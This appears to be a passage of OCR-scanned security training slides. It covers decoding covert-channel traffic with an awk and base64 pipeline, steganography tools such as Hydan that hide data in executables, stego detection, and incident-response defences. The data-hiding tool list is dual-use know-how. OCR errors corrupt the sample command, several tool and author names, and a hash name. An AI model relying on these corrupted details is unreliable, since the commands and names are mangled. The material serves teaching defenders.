— Will output dog dog dog
• Base64 --decode will decode the data
• It should look something like this:
— $ echo <paste your string here> | <awk command here> | <Base64 decode here>
• But, there is more than one path!
— Ruby! Python! Perl!
• Don’t forget to use the man pages!!

One Possible Solution:
rootsllngshot :-# echo eyJjb%1tYW5kcyI6IFtdLCAiYWUThnQiOiAiMDA6MGM6Mjk6Nzk6M%U6NTkifQ3D%3D | | awk '{gsub(/%0A/,""); gsub(/%3D/,"=")}1' | base64 --decode;

In Conclusion
• Detecting and decoding covert channels can be hard
• However, with a little work, we can peer into the commands of the bad guys
• Please try out this tool at work
— With permission, of course
• You can convert the python script to .exe with tools like pylnjector, pyinstaller, and py2exe.

You can convert the python into a .exe and get real fancy with tools like pyinstaller, pyInjector, and py2exe. The following link is an article on how to do this by Mark Baggeft (Luke’s dad):

Covert Channel Defenses:
• Containment
— Delete attacker’s program
— Look for program on other systems
• Eradication
— If attacker compromised admin/root account, rebuild
• Recovery
— Monitor system very closely


Steganography (Stego):
• Steganography abbreviated as stego, not to be confused with stenography
• Involves concealing the fact that you are sending “sensitive” information
• Data hiding
• Can hide in a variety of formats
- Images
— Word documents
— Text documents
— Machine-generated images
(fractals, complex words of animals/flowers/people...)

Sample Stego Tools:
• The following are some example programs:
— Jsteg — hides in jpeg images using the DCT coefficients
— MP3Stego — hides in mpeg files
- S-Mail — hides data in exe and dil files
— Invisible Secrets — hides data in banner ads that appear on websites
— Stash — hides data in a variety of image formats
— Hydan — hides data in UNIX/Linux and Windows executables

More Stego Tools:
• There are a number of excellent tools for hiding data in a variety of different formats
• Open$tego — Embeds data and digital watermarks into images
• SilentEye Embeds encrypted data and other files into JPEG, BMP, and WAVE formats
• OpenPuff — Great support for images, audio, video, and flash-Adobe files
- Also supports multipassword support
- Plausible deniability
- Multiple rounds of encryption with different algorithms for additional stego tools, check out the following site:

Setgo Example — Hydan:
• Hydan hides data in executables written for 1386
— Written by Rakan E1-KhalIl
- Supports *BSD, Linux, and WinXP Øp
• Start with an executable, as well as message to hide
• Feed both through Hydan
• Hydan encrypts the data with blowfish with user-provided passphrase, and then embeds the data
• Result: one executable, same size
• Take the resulting executable... it’ll still run
• However, by sending it back through Hydan, the original message can be recovered.

How Hydan Hides Info:
• First off, it just encrypts the message using blowfish
• Next, it uses polymorphic coding techniques to hide the data
• Hydan has several groups of functionally equivalent instructions
— Add X, Y versus Sub X, -Y
• By choosing an instruction from one group, we get a “zero” bit
• By choosing an instruction from another group, we get a “one” bit
• Just encode all the bits like that!
• Then, rewrite the polymorphic executable.

Efficienty Rate and Detection:
• Hydan can hide one byte of data in approximately 150 bytes of code
• It does alter the statistical pattern of instructions in a program
— Think about how often you subtract a negative number (X minus —22)
— Usually, you just add (X plus 22)
— Therefore, there’s a possible signature here,..
• Consider a histogram of instructions and how it would change
• Craig S. Wright developed a tool for detecting these anomalies to identify “Hydanized” executables
— Described at

Detecting Stego:
• StegExpose: Java utility to detect stego in lossless images where Least Significant Bit (LSB) techniques
— This stego is where the least significant bits, which determine color, are modified
— This leads to a very slight (think imperceptible) change of color made to the original image
• Supports a number of different “detectors” or mathematical analysis techniques to detect stego
• For quick analysis, it can also use “cheap” or quick analysis methods to detect the presence of stego
• Has the ability to run on a large number of files very quickly
• It can be found here:

Defending Against Stego (I):
• Preparation
— Get familiar with stego tools
— Look for changes to critical web server files (file integrity-checking tools)
• Identification
— If you have the original source image, detection is easy
• Perform a cliff or file comparison and see whether they are different
• MD5 or SHA-; hashes can help
• Stego might not change the size or make any observable changes, but it does change the data

Defending Against Stego (II)

— If you are working an HR or legal case, take direction from your legal team
• Many times, this will involve watching a suspects system for an extended period of time
• Remember S-Tools changes the number of near-duplicate colors
• Not easy to do
• Usually requires determining statistics or large number of clean files to come up with unique properties
• Containment
— Work with law enforcement and HR
• Erad, Recov: Work with your company’s legal team.

Putting It All Together:
• We’ve discussed each of these tools on a one-byone basis
• The tools are seldom employed this way
• They are often used together in very elaborate schemes to effectively undermine the security of an organization
• We now go through two structured sample attacks, drawing on the ideas and tools we discuss throughout the course.

Mistake Number 10:
- this scenario could be written because of the data retrieved from logs.
- the information associated with the intrusion was available, but it was not analyzed until after the damage was done.
- we need to be proactive about log analysis.

• Numerous podcasts provide in-depth information about security
— Security Weekly Podcast:
— Network Security Podcast:
— Securabit Podcast:
— Data Security Podcast: